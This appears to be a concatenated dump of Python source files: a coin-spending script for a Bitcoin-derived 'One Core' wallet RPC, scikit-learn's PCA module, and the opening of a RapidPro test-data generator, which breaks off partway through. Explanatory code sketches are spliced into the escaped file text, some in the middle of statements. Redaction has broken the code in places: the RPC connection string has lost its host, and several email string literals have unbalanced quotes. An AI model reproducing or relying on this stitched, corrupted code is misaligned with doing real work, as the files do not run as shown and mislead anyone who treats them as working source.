jsonrpc import ServiceProxy, json\n\nBASE_FEE=Decimal(""0.001"")\n\ndef check_json_precision():\n """"""Make sure json library being used does not lose precision converting BTC values""""""\n n = Decimal(""20000000.00000003"")\n satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)\n if satoshis != 2000000000000003:\n raise RuntimeError(""JSON encode/decode loses precision"")\n\ndef determine_db_dir():\n """"""Return the default location of the One Core data directory""""""\n if platform.system() == ""Darwin"":\n return os.path.expanduser(""~/Library/Application Support/OneCore/"")\n elif platform.system() == 
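# check_json_precision in the script below guards against float round-tripping:
# a JSON library that goes through IEEE doubles can silently lose satoshis.
# A minimal sketch of the exact check it performs:
from decimal import Decimal
import json

n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n))) * 1.0e8)
assert satoshis == 2000000000000003   # doubles still hold this value exactly
# The same idea breaks once amounts exceed 2**53 satoshis, which is why the
# script casts through Decimal wherever it does arithmetic on amounts.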
""Windows"":\n return os.path.join(os.environ[\'APPDATA\'], ""OneCore"")\n return os.path.expanduser(""~/.onecore"")\n\ndef read_bitcoin_config(dbdir):\n """"""Read the one.conf file from dbdir, returns dictionary of settings""""""\n from ConfigParser import SafeConfigParser\n\n class FakeSecHead(object):\n def __init__(self, fp):\n self.fp = fp\n self.sechead = \'[all]\\n\'\n def readline(self):\n if self.sechead:\n try: return self.sechead\n finally: self.sechead = None\n else:\n s = self.fp.readline()\n if s.find(\'#\') != -1:\n s = s[0:s.find(\'#\')].strip() +""\\n""\n return s\n\n config_parser = SafeConfigParser()\n config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, ""one.conf""))))\n return dict(config_parser.items(""all""))\n\ndef connect_JSON(config):\n """"""Connect to a One Core JSON-RPC server""""""\n testnet = config.get(\'testnet\', \'0\')\n testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False\n if not \'rpcport\' in config:\n config[\'rpcport\'] = 19998 if testnet else 9876\n connect = ""http://%s:dummy@email.com:%s""%(config[\'rpcuser\'], config[\'rpcpassword\'], config[\'rpcport\'])\n try:\n result = ServiceProxy(connect)\n # ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,\n # but also make sure the oned we\'re talking to is/isn\'t testnet:\n if result.getmininginfo()[\'testnet\'] != testnet:\n sys.stderr.write(""RPC server at ""+connect+"" testnet setting mismatch\\n"")\n sys.exit(1)\n return result\n except:\n sys.stderr.write(""Error connecting to RPC server at ""+connect+""\\n"")\n sys.exit(1)\n\ndef unlock_wallet(oned):\n info = oned.getinfo()\n if \'unlocked_until\' not in info:\n return True # wallet is not encrypted\n t = int(info[\'unlocked_until\'])\n if t <= time.time():\n try:\n passphrase = getpass.getpass(""Wallet is locked; enter passphrase: "")\n oned.walletpassphrase(passphrase, 5)\n except:\n sys.stderr.write(""Wrong passphrase\\n"")\n\n info = oned.getinfo()\n return int(info[\'unlocked_until\']) > time.time()\n\ndef list_available(oned):\n address_summary = dict()\n\n address_to_account = dict()\n for info in oned.listreceivedbyaddress(0):\n address_to_account[info[""address""]] = info[""account""]\n\n unspent = oned.listunspent(0)\n for output in unspent:\n # listunspent doesn\'t give addresses, so:\n rawtx = oned.getrawtransaction(output[\'txid\'], 1)\n vout = rawtx[""vout""][output[\'vout\']]\n pk = vout[""scriptPubKey""]\n\n # This code only deals with ordinary pay-to-one-address\n # or pay-to-script-hash outputs right now; anything exotic is ignored.\n if pk[""type""] != ""pubkeyhash"" and pk[""type""] != ""scripthash"":\n continue\n\n address = pk[""addresses""][0]\n if address in address_summary:\n address_summary[address][""total""] += vout[""value""]\n address_summary[address][""outputs""].append(output)\n else:\n address_summary[address] = {\n ""total"" : vout[""value""],\n ""outputs"" : [output],\n ""account"" : address_to_account.get(address, """")\n }\n\n return address_summary\n\ndef select_coins(needed, inputs):\n # Feel free to improve this, this is good enough for my simple needs:\n outputs = []\n have = Decimal(""0.0"")\n n = 0\n while have < needed and n < len(inputs):\n outputs.append({ ""txid"":inputs[n][""txid""], ""vout"":inputs[n][""vout""]})\n have += inputs[n][""amount""]\n n += 1\n return (outputs, have-needed)\n\ndef create_tx(oned, fromaddresses, toaddress, amount, fee):\n all_coins = list_available(oned)\n\n total_available = Decimal(""0.0"")\n needed = 
amount+fee\n potential_inputs = []\n for addr in fromaddresses:\n if addr not in all_coins:\n continue\n potential_inputs.extend(all_coins[addr][""outputs""])\n total_available += all_coins[addr][""total""]\n\n if total_available < needed:\n sys.stderr.write(""Error, only %f BTC available, need %f\\n""%(total_available, needed));\n sys.exit(1)\n\n #\n # Note:\n # Python\'s json/jsonrpc modules have inconsistent support for Decimal numbers.\n # Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode\n # Decimals, I\'m casting amounts to float before sending them to oned.\n #\n outputs = { toaddress : float(amount) }\n (inputs, change_amount) = select_coins(needed, potential_inputs)\n if change_amount > BASE_FEE: # don\'t bother with zero or tiny change\n change_address = fromaddresses[-1]\n if change_address in outputs:\n outputs[change_address] += float(change_amount)\n else:\n outputs[change_address] = float(change_amount)\n\n rawtx = oned.createrawtransaction(inputs, outputs)\n signed_rawtx = oned.signrawtransaction(rawtx)\n if not signed_rawtx[""complete""]:\n sys.stderr.write(""signrawtransaction failed\\n"")\n sys.exit(1)\n txdata = signed_rawtx[""hex""]\n\n return txdata\n\ndef compute_amount_in(oned, txinfo):\n result = Decimal(""0.0"")\n for vin in txinfo[\'vin\']:\n in_info = oned.getrawtransaction(vin[\'txid\'], 1)\n vout = in_info[\'vout\'][vin[\'vout\']]\n result = result + vout[\'value\']\n return result\n\ndef compute_amount_out(txinfo):\n result = Decimal(""0.0"")\n for vout in txinfo[\'vout\']:\n result = result + vout[\'value\']\n return result\n\ndef sanity_test_fee(oned, txdata_hex, max_fee):\n class FeeError(RuntimeError):\n pass\n try:\n txinfo = oned.decoderawtransaction(txdata_hex)\n total_in = compute_amount_in(oned, txinfo)\n total_out = compute_amount_out(txinfo)\n if total_in-total_out > max_fee:\n raise FeeError(""Rejecting transaction, unreasonable fee of ""+str(total_in-total_out))\n\n tx_size = len(txdata_hex)/2\n kb = tx_size/1000 # integer division rounds down\n if kb > 1 and fee < BASE_FEE:\n raise FeeError(""Rejecting no-fee transaction, larger than 1000 bytes"")\n if total_in < 0.01 and fee < BASE_FEE:\n raise FeeError(""Rejecting no-fee, tiny-amount transaction"")\n # Exercise for the reader: compute transaction priority, and\n # warn if this is a very-low-priority transaction\n\n except FeeError as err:\n sys.stderr.write((str(err)+""\\n""))\n sys.exit(1)\n\ndef main():\n import optparse\n\n parser = optparse.OptionParser(usage=""%prog [options]"")\n parser.add_option(""--from"", dest=""fromaddresses"", default=None,\n help=""addresses to get ones from"")\n parser.add_option(""--to"", dest=""to"", default=None,\n help=""address to get send ones to"")\n parser.add_option(""--amount"", dest=""amount"", default=None,\n help=""amount to send"")\n parser.add_option(""--fee"", dest=""fee"", default=""0.0"",\n help=""fee to include"")\n parser.add_option(""--datadir"", dest=""datadir"", default=determine_db_dir(),\n help=""location of one.conf file with RPC username/password (default: %default)"")\n parser.add_option(""--testnet"", dest=""testnet"", default=False, action=""store_true"",\n help=""Use the test network"")\n parser.add_option(""--dry_run"", dest=""dry_run"", default=False, action=""store_true"",\n help=""Don\'t broadcast the transaction, just create and print the transaction data"")\n\n (options, args) = parser.parse_args()\n\n check_json_precision()\n config = read_bitcoin_config(options.datadir)\n if options.testnet: 
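# sanity_test_fee below derives the implied fee from the transaction itself:
# whatever the inputs carry beyond the outputs goes to the miner. A one-line
# sketch of that invariant:
from decimal import Decimal

def implied_fee(total_in, total_out):
    return total_in - total_out   # anything unaccounted-for is the fee

assert implied_fee(Decimal("1.0"), Decimal("0.98")) == Decimal("0.02")
# The script then rejects if this exceeds max_fee (1% of the amount in main()).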
config[\'testnet\'] = True\n oned = connect_JSON(config)\n\n if options.amount is None:\n address_summary = list_available(oned)\n for address,info in address_summary.iteritems():\n n_transactions = len(info[\'outputs\'])\n if n_transactions > 1:\n print(""%s %.8f %s (%d transactions)""%(address, info[\'total\'], info[\'account\'], n_transactions))\n else:\n print(""%s %.8f %s""%(address, info[\'total\'], info[\'account\']))\n else:\n fee = Decimal(options.fee)\n amount = Decimal(options.amount)\n while unlock_wallet(oned) == False:\n pass # Keep asking for passphrase until they get it right\n txdata = create_tx(oned, options.fromaddresses.split("",""), options.to, amount, fee)\n sanity_test_fee(oned, txdata, amount*Decimal(""0.01""))\n if options.dry_run:\n print(txdata)\n else:\n txid = oned.sendrawtransaction(txdata)\n print(txid)\n\nif __name__ == \'__main__\':\n main()\n', '"""""" Principal Component Analysis\n""""""\n\n# Author: Alexandre Gramfort dummy@email.com\n# Olivier Grisel dummy@email.com\n# Mathieu Blondel dummy@email.com\n# Denis A. Engemann dummy@email.com\n#\n# License: BSD 3 clause\n\nfrom math import log, sqrt\nimport warnings\n\nimport numpy as np\nfrom scipy import linalg\nfrom scipy.special import gammaln\n\nfrom ..base import BaseEstimator, TransformerMixin\nfrom ..utils import array2d, check_random_state, as_float_array\nfrom ..utils import atleast2d_or_csr\nfrom ..utils.extmath import fast_logdet, safe_sparse_dot, randomized_svd, \\\n fast_dot\n\n\ndef _assess_dimension_(spectrum, rank, n_samples, n_features):\n """"""Compute the likelihood of a rank ``rank`` dataset\n\n The dataset is assumed to be embedded in gaussian noise of shape(n,\n dimf) having spectrum ``spectrum``.\n\n Parameters\n ----------\n spectrum: array of shape (n)\n data spectrum\n rank: int,\n tested rank value\n n_samples: int,\n number of samples\n dim: int,\n embedding/empirical dimension\n\n Returns\n -------\n ll: float,\n The log-likelihood\n\n Notes\n -----\n This implements the method of `Thomas P. Minka:\n Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604`\n """"""\n if rank > len(spectrum):\n raise ValueError(""The tested rank cannot exceed the rank of the""\n "" dataset"")\n\n pu = -rank * log(2.)\n for i in range(rank):\n pu += (gammaln((n_features - i) / 2.)\n - log(np.pi) * (n_features - i) / 2.)\n\n pl = np.sum(np.log(spectrum[:rank]))\n pl = -pl * n_samples / 2.\n\n if rank == n_features:\n pv = 0\n v = 1\n else:\n v = np.sum(spectrum[rank:]) / (n_features - rank)\n pv = -np.log(v) * n_samples * (n_features - rank) / 2.\n\n m = n_features * rank - rank * (rank + 1.) / 2.\n pp = log(2. * np.pi) * (m + rank + 1.) / 2.\n\n pa = 0.\n spectrum_ = spectrum.copy()\n spectrum_[rank:n_features] = v\n for i in range(rank):\n for j in range(i + 1, len(spectrum)):\n pa += log((spectrum[i] - spectrum[j]) *\n (1. / spectrum_[j] - 1. / spectrum_[i])) + log(n_samples)\n\n ll = pu + pl + pv + pp - pa / 2. 
- rank * log(n_samples) / 2.\n\n return ll\n\n\ndef _infer_dimension_(spectrum, n_samples, n_features):\n """"""Infers the dimension of a dataset of shape (n_samples, n_features)\n\n The dataset is described by its spectrum `spectrum`.\n """"""\n n_spectrum = len(spectrum)\n ll = np.empty(n_spectrum)\n for rank in range(n_spectrum):\n ll[rank] = _assess_dimension_(spectrum, rank, n_samples, n_features)\n return ll.argmax()\n\n\nclass PCA(BaseEstimator, TransformerMixin):\n """"""Principal component analysis (PCA)\n\n Linear dimensionality reduction using Singular Value Decomposition of the\n data and keeping only the most significant singular vectors to project the\n data to a lower dimensional space.\n\n This implementation uses the scipy.linalg implementation of the singular\n value decomposition. It only works for dense arrays and is not scalable to\n large dimensional data.\n\n The time complexity of this implementation is ``O(n ** 3)`` assuming\n n ~ n_samples ~ n_features.\n\n Parameters\n ----------\n n_components : int, None or string\n Number of components to keep.\n if n_components is not set all components are kept::\n\n n_components == min(n_samples, n_features)\n\n if n_components == \'mle\', Minka\\\'s MLE is used to guess the dimension\n if ``0 < n_components < 1``, select the number of components such that\n the amount of variance that needs to be explained is greater than the\n percentage specified by n_components\n\n copy : bool\n If False, data passed to fit are overwritten and running\n fit(X).transform(X) will not yield the expected results,\n use fit_transform(X) instead.\n\n whiten : bool, optional\n When True (False by default) the `components_` vectors are divided\n by n_samples times singular values to ensure uncorrelated outputs\n with unit component-wise variances.\n\n Whitening will remove some information from the transformed signal\n (the relative variance scales of the components) but can sometime\n improve the predictive accuracy of the downstream estimators by\n making there data respect some hard-wired assumptions.\n\n Attributes\n ----------\n `components_` : array, [n_components, n_features]\n Components with maximum variance.\n\n `explained_variance_ratio_` : array, [n_components]\n Percentage of variance explained by each of the selected components. \\\n k is not set then all components are stored and the sum of explained \\\n variances is equal to 1.0\n\n `n_components_` : int\n The estimated number of components. Relevant when n_components is set\n to \'mle\' or a number between 0 and 1 to select using explained\n variance.\n\n Notes\n -----\n For n_components=\'mle\', this class uses the method of `Thomas P. Minka:\n Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604`\n\n Due to implementation subtleties of the Singular Value Decomposition (SVD),\n which is used in this implementation, running fit twice on the same matrix\n can lead to principal components with signs flipped (change in direction).\n For this reason, it is important to always use the same estimator object to\n transform data in a consistent fashion.\n\n Examples\n --------\n\n >>> import numpy as np\n >>> from sklearn.decomposition import PCA\n >>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])\n >>> pca = PCA(n_components=2)\n >>> pca.fit(X)\n PCA(copy=True, n_components=2, whiten=False)\n >>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS\n [ 0.99244... 
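# Choosing n_components as a fraction in (0, 1) selects the smallest number of
# components whose cumulative explained-variance ratio crosses that threshold,
# exactly as _fit does further down. A NumPy sketch with invented ratios:
import numpy as np

ratios = np.array([0.7, 0.2, 0.08, 0.02])   # a hypothetical explained_variance_ratio_
threshold = 0.85
n_components = np.sum(ratios.cumsum() < threshold) + 1
assert n_components == 2                     # 0.7 + 0.2 already exceeds 0.85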
0.00755...]\n\n See also\n --------\n ProbabilisticPCA\n RandomizedPCA\n KernelPCA\n SparsePCA\n TruncatedSVD\n """"""\n def __init__(self, n_components=None, copy=True, whiten=False):\n self.n_components = n_components\n self.copy = copy\n self.whiten = whiten\n\n def fit(self, X, y=None):\n """"""Fit the model with X.\n\n Parameters\n ----------\n X: array-like, shape (n_samples, n_features)\n Training data, where n_samples in the number of samples\n and n_features is the number of features.\n\n Returns\n -------\n self : object\n Returns the instance itself.\n """"""\n self._fit(X)\n return self\n\n def fit_transform(self, X, y=None):\n """"""Fit the model with X and apply the dimensionality reduction on X.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n Returns\n -------\n X_new : array-like, shape (n_samples, n_components)\n\n """"""\n U, S, V = self._fit(X)\n U = U[:, :self.n_components_]\n\n if self.whiten:\n # X_new = X * V / S * sqrt(n_samples) = U * sqrt(n_samples)\n U *= sqrt(X.shape[0])\n else:\n # X_new = X * V = U * S * V^T * V = U * S\n U *= S[:self.n_components_]\n\n return U\n\n def _fit(self, X):\n """""" Fit the model on X\n Parameters\n ----------\n X: array-like, shape (n_samples, n_features)\n Training vector, where n_samples in the number of samples and\n n_features is the number of features.\n\n Returns\n -------\n U, s, V : ndarrays\n The SVD of the input data, copied and centered when\n requested.\n """"""\n X = array2d(X)\n n_samples, n_features = X.shape\n X = as_float_array(X, copy=self.copy)\n # Center data\n self.mean_ = np.mean(X, axis=0)\n X -= self.mean_\n U, S, V = linalg.svd(X, full_matrices=False)\n self.explained_variance_ = (S ** 2) / n_samples\n self.explained_variance_ratio_ = (self.explained_variance_ /\n self.explained_variance_.sum())\n\n if self.whiten:\n self.components_ = V / S[:, np.newaxis] * sqrt(n_samples)\n else:\n self.components_ = V\n\n n_components = self.n_components\n if n_components is None:\n n_components = n_features\n elif n_components == \'mle\':\n if n_samples < n_features:\n raise ValueError(""n_components=\'mle\' is only supported ""\n ""if n_samples >= n_features"")\n n_components = _infer_dimension_(self.explained_variance_,\n n_samples, n_features)\n\n if 0 < n_components < 1.0:\n # number of components for which the cumulated explained variance\n # percentage is superior to the desired threshold\n ratio_cumsum = self.explained_variance_ratio_.cumsum()\n n_components = np.sum(ratio_cumsum < n_components) + 1\n\n self.components_ = self.components_[:n_components, :]\n self.explained_variance_ = \\\n self.explained_variance_[:n_components]\n self.explained_variance_ratio_ = \\\n self.explained_variance_ratio_[:n_components]\n\n self.n_components_ = n_components\n return (U, S, V)\n\n def transform(self, X):\n """"""Apply the dimensionality reduction on X.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n New data, where n_samples is the number of samples\n and n_features is the number of features.\n\n Returns\n -------\n X_new : array-like, shape (n_samples, n_components)\n\n """"""\n X = array2d(X)\n if self.mean_ is not None:\n X = X - self.mean_\n X_transformed = fast_dot(X, self.components_.T)\n return X_transformed\n\n def inverse_transform(self, X):\n """"""Transform data back to its original space, i.e.,\n return an input X_original whose transform would be 
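# With whitening, fit_transform above rescales U so each component has unit
# variance: X_new = U * sqrt(n_samples) instead of U * S. A quick NumPy check
# that the whitened projection is decorrelated with unit variance:
import numpy as np

rng = np.random.RandomState(0)
X = rng.randn(200, 3) * np.array([2.0, 1.0, 0.1])   # three variance scales
X -= X.mean(axis=0)                                 # center, as _fit does
U, S, V = np.linalg.svd(X, full_matrices=False)
X_white = U * np.sqrt(X.shape[0])                   # whitened scores
np.testing.assert_allclose(np.dot(X_white.T, X_white) / X.shape[0],
                           np.eye(3), atol=1e-10)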
X\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_components)\n New data, where n_samples is the number of samples\n and n_components is the number of components.\n\n Returns\n -------\n X_original array-like, shape (n_samples, n_features)\n\n Notes\n -----\n If whitening is enabled, inverse_transform does not compute the\n exact inverse operation as transform.\n """"""\n return fast_dot(X, self.components_) + self.mean_\n\n\nclass ProbabilisticPCA(PCA):\n """"""Additional layer on top of PCA that adds a probabilistic evaluation""""""\n __doc__ += PCA.__doc__\n\n def fit(self, X, y=None, homoscedastic=True):\n """"""Additionally to PCA.fit, learns a covariance model\n\n Parameters\n ----------\n X : array of shape(n_samples, n_features)\n The data to fit\n\n homoscedastic : bool, optional,\n If True, average variance across remaining dimensions\n """"""\n PCA.fit(self, X)\n n_samples, n_features = X.shape\n self._dim = n_features\n Xr = X - self.mean_\n Xr -= np.dot(np.dot(Xr, self.components_.T), self.components_)\n\n n_components = self.n_components\n if n_components is None:\n n_components = n_features\n\n # Make the low rank part of the estimated covariance\n self.covariance_ = np.dot(self.components_[:n_components].T *\n self.explained_variance_[:n_components],\n self.components_[:n_components])\n\n if n_features == n_components:\n delta = 0.\n elif homoscedastic:\n delta = (Xr ** 2).sum() / (n_samples * n_features)\n else:\n delta = (Xr ** 2).mean(axis=0) / (n_features - n_components)\n\n # Add delta to the diagonal without extra allocation\n self.covariance_.flat[::n_features + 1] += delta\n\n return self\n\n def score(self, X, y=None):\n """"""Return a score associated to new data\n\n Parameters\n ----------\n X: array of shape(n_samples, n_features)\n The data to test\n\n Returns\n -------\n ll: array of shape (n_samples),\n log-likelihood of each row of X under the current model\n """"""\n Xr = X - self.mean_\n n_features = X.shape[1]\n log_like = np.zeros(X.shape[0])\n self.precision_ = linalg.inv(self.covariance_)\n log_like = -.5 * (Xr * (np.dot(Xr, self.precision_))).sum(axis=1)\n log_like -= .5 * (fast_logdet(self.covariance_)\n + n_features * log(2. * np.pi))\n return log_like\n\n\nclass RandomizedPCA(BaseEstimator, TransformerMixin):\n """"""Principal component analysis (PCA) using randomized SVD\n\n Linear dimensionality reduction using approximated Singular Value\n Decomposition of the data and keeping only the most significant\n singular vectors to project the data to a lower dimensional space.\n\n Parameters\n ----------\n n_components : int, optional\n Maximum number of components to keep. When not given or None, this\n is set to n_features (the second dimension of the training data).\n\n copy : bool\n If False, data passed to fit are overwritten and running\n fit(X).transform(X) will not yield the expected results,\n use fit_transform(X) instead.\n\n iterated_power : int, optional\n Number of iterations for the power method. 
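# ProbabilisticPCA.score above is the standard multivariate-Gaussian log-density
# evaluated with the low-rank-plus-diagonal covariance learned in fit. A direct
# NumPy check of that formula against scipy.stats for a small covariance:
import numpy as np
from scipy import linalg
from scipy.stats import multivariate_normal

cov = np.array([[2.0, 0.3], [0.3, 1.0]])
x = np.array([[0.5, -0.2]])
precision = linalg.inv(cov)
ll = -0.5 * (x * np.dot(x, precision)).sum(axis=1)
ll -= 0.5 * (np.log(linalg.det(cov)) + x.shape[1] * np.log(2 * np.pi))
np.testing.assert_allclose(ll, multivariate_normal(mean=[0, 0], cov=cov).logpdf(x))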
3 by default.\n\n whiten : bool, optional\n When True (False by default) the `components_` vectors are divided\n by the singular values to ensure uncorrelated outputs with unit\n component-wise variances.\n\n Whitening will remove some information from the transformed signal\n (the relative variance scales of the components) but can sometime\n improve the predictive accuracy of the downstream estimators by\n making their data respect some hard-wired assumptions.\n\n random_state : int or RandomState instance or None (default)\n Pseudo Random Number generator seed control. If None, use the\n numpy.random singleton.\n\n Attributes\n ----------\n `components_` : array, [n_components, n_features]\n Components with maximum variance.\n\n `explained_variance_ratio_` : array, [n_components]\n Percentage of variance explained by each of the selected components. \\\n k is not set then all components are stored and the sum of explained \\\n variances is equal to 1.0\n\n Examples\n --------\n >>> import numpy as np\n >>> from sklearn.decomposition import RandomizedPCA\n >>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])\n >>> pca = RandomizedPCA(n_components=2)\n >>> pca.fit(X) # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE\n RandomizedPCA(copy=True, iterated_power=3, n_components=2,\n random_state=None, whiten=False)\n >>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS\n [ 0.99244... 0.00755...]\n\n See also\n --------\n PCA\n ProbabilisticPCA\n TruncatedSVD\n\n References\n ----------\n\n .. [Halko2009] `Finding structure with randomness: Stochastic algorithms\n for constructing approximate matrix decompositions Halko, et al., 2009\n (arXiv:909)`\n\n .. [MRT] `A randomized algorithm for the decomposition of matrices\n Per-Gunnar Martinsson, Vladimir Rokhlin and Mark Tygert`\n\n Notes\n -----\n This class supports sparse matrix input for backward compatibility, but\n actually computes a truncated SVD instead of a PCA in that case (i.e. no\n centering is performed). 
This support is deprecated; use the class\n TruncatedSVD for sparse matrix support.\n\n """"""\n\n def __init__(self, n_components=None, copy=True, iterated_power=3,\n whiten=False, random_state=None):\n self.n_components = n_components\n self.copy = copy\n self.iterated_power = iterated_power\n self.whiten = whiten\n self.mean_ = None\n self.random_state = random_state\n\n def fit(self, X, y=None):\n """"""Fit the model with X.\n\n Parameters\n ----------\n X: array-like, shape (n_samples, n_features)\n Training data, where n_samples in the number of samples\n and n_features is the number of features.\n\n Returns\n -------\n self : object\n Returns the instance itself.\n """"""\n self._fit(X)\n return self\n\n def _fit(self, X):\n """"""Fit the model to the data X.\n\n Parameters\n ----------\n X: array-like, shape (n_samples, n_features)\n Training vector, where n_samples in the number of samples and\n n_features is the number of features.\n\n Returns\n -------\n X : ndarray, shape (n_samples, n_features)\n The input data, copied, centered and whitened when requested.\n """"""\n random_state = check_random_state(self.random_state)\n if hasattr(X, \'todense\'):\n warnings.warn(""Sparse matrix support is deprecated""\n "" and will be dropped in 0.16.""\n "" Use TruncatedSVD instead."",\n DeprecationWarning)\n else:\n # not a sparse matrix, ensure this is a 2D array\n X = np.atleast_2d(as_float_array(X, copy=self.copy))\n\n n_samples = X.shape[0]\n\n if not hasattr(X, \'todense\'):\n # Center data\n self.mean_ = np.mean(X, axis=0)\n X -= self.mean_\n if self.n_components is None:\n n_components = X.shape[1]\n else:\n n_components = self.n_components\n\n U, S, V = randomized_svd(X, n_components,\n n_iter=self.iterated_power,\n random_state=random_state)\n\n self.explained_variance_ = exp_var = (S ** 2) / n_samples\n self.explained_variance_ratio_ = exp_var / exp_var.sum()\n\n if self.whiten:\n self.components_ = V / S[:, np.newaxis] * sqrt(n_samples)\n else:\n self.components_ = V\n\n return X\n\n def transform(self, X, y=None):\n """"""Apply dimensionality reduction on X.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n New data, where n_samples in the number of samples\n and n_features is the number of features.\n\n Returns\n -------\n X_new : array-like, shape (n_samples, n_components)\n\n """"""\n # XXX remove scipy.sparse support here in 0.16\n X = atleast2d_or_csr(X)\n if self.mean_ is not None:\n X = X - self.mean_\n\n X = safe_sparse_dot(X, self.components_.T)\n return X\n\n def fit_transform(self, X, y=None):\n """"""Apply dimensionality reduction on X.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n New data, where n_samples in the number of samples\n and n_features is the number of features.\n\n Returns\n -------\n X_new : array-like, shape (n_samples, n_components)\n\n """"""\n X = self._fit(atleast2d_or_csr(X))\n X = safe_sparse_dot(X, self.components_.T)\n return X\n\n def inverse_transform(self, X, y=None):\n """"""Transform data back to its original space.\n\n Returns an array X_original whose transform would be X.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_components)\n New data, where n_samples in the number of samples\n and n_components is the number of components.\n\n Returns\n -------\n X_original array-like, shape (n_samples, n_features)\n\n Notes\n -----\n If whitening is enabled, inverse_transform does not compute the\n exact inverse operation of transform.\n """"""\n # XXX remove 
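# RandomizedPCA delegates the heavy lifting to randomized_svd, which
# approximates the top-k singular triplets with a few power iterations instead
# of a full decomposition. A sketch of the call _fit makes (randomized_svd is
# sklearn.utils.extmath.randomized_svd; exact defaults vary by version):
import numpy as np
from sklearn.utils.extmath import randomized_svd

rng = np.random.RandomState(0)
X = rng.randn(100, 20)
X -= X.mean(axis=0)   # the estimator centers dense input before the SVD
U, S, V = randomized_svd(X, n_components=2, n_iter=3, random_state=rng)
assert U.shape == (100, 2) and S.shape == (2,) and V.shape == (2, 20)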
scipy.sparse support here in 0.16\n X_original = safe_sparse_dot(X, self.components_)\n if self.mean_ is not None:\n X_original = X_original + self.mean_\n return X_original\n', 'from __future__ import unicode_literals, division, print_function\n\nimport json\nimport math\nimport pytz\nimport random\nimport resource\nimport six\nimport sys\nimport time\nimport uuid\n\nfrom collections import defaultdict\nfrom datetime import timedelta\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.core.management import BaseCommand, CommandError\nfrom django.core.management.base import CommandParser\nfrom django.db import connection, transaction\nfrom django.utils import timezone\nfrom django_redis import get_redis_connection\nfrom subprocess import check_call, CalledProcessError\nfrom temba.channels.models import Channel\nfrom temba.channels.tasks import squash_channelcounts\nfrom temba.contacts.models import Contact, ContactField, ContactGroup, ContactURN, ContactGroupCount, URN, TEL_SCHEME, TWITTER_SCHEME\nfrom temba.flows.models import FlowStart, FlowRun\nfrom temba.flows.tasks import squash_flowpathcounts, squash_flowruncounts, prune_recentmessages\nfrom temba.locations.models import AdminBoundary\nfrom temba.msgs.models import Label, Msg\nfrom temba.msgs.tasks import squash_labelcounts\nfrom temba.orgs.models import Org\nfrom temba.orgs.tasks import squash_topupcredits\nfrom temba.utils import chunk_list, ms_to_datetime, datetime_to_str, datetime_to_ms\nfrom temba.values.models import Value\n\n\n# maximum age in days of database content\nCONTENT_AGE = 3 * 365\n\n# every user will have this password including the superuser\nUSER_PASSWORD = ""Qwerty123""\n\n# database dump containing admin boundary records\nLOCATIONS_DUMP = \'test-data/nigeria.bin\'\n\n# organization names are generated from these components\nORG_NAMES = (\n (""UNICEF"", ""WHO"", ""WFP"", ""UNESCO"", ""UNHCR"", ""UNITAR"", ""FAO"", ""UNEP"", ""UNAIDS"", ""UNDAF""),\n (""Nigeria"", ""Chile"", ""Indonesia"", ""Rwanda"", ""Mexico"", ""Zambia"", ""India"", ""Brazil"", ""Sudan"", ""Mozambique"")\n)\n\n# the users, channels, groups, labels and fields to create for each organization\nUSERS = (\n {\'username\': ""admin%d"", \'email\': dummy@email.com"", \'role\': \'administrators\'},\n {\'username\': ""editor%d"", \'email\': dummy@email.com"", \'role\': \'editors\'},\n {\'username\': ""viewer%d"", \'email\': dummy@email.com"", \'role\': \'viewers\'},\n {\'username\': ""surveyor%d"", \'email\': dummy@email.com"", \'role\': \'surveyors\'},\n)\nCHANNELS = (\n {\'name\': ""Android"", \'channel_type\': Channel.TYPE_ANDROID, \'scheme\': \'tel\', \'address\': ""1234""},\n {\'name\': ""Nexmo"", \'channel_type\': Channel.TYPE_NEXMO, \'scheme\': \'tel\', \'address\': ""2345""},\n {\'name\': ""Twitter"", \'channel_type\': \'TT\', \'scheme\': \'twitter\', \'address\': ""my_handle""},\n)\nFIELDS = (\n {\'key\': \'gender\', \'label\': ""Gender"", \'value_type\': Value.TYPE_TEXT},\n {\'key\': \'age\', \'label\': ""Age"", \'value_type\': Value.TYPE_DECIMAL},\n {\'key\': \'joined\', \'label\': ""Joined On"", \'value_type\': Value.TYPE_DATETIME},\n {\'key\': \'ward\', \'label\': ""Ward"", \'value_type\': Value.TYPE_WARD},\n {\'key\': \'district\', \'label\': ""District"", \'value_type\': Value.TYPE_DISTRICT},\n {\'key\': \'state\', \'label\': ""State"", \'value_type\': Value.TYPE_STATE},\n)\nGROUPS = (\n {\'name\': ""Reporters"", \'query\': None, \'member\': 0.95}, # member is either a probability or callable\n 
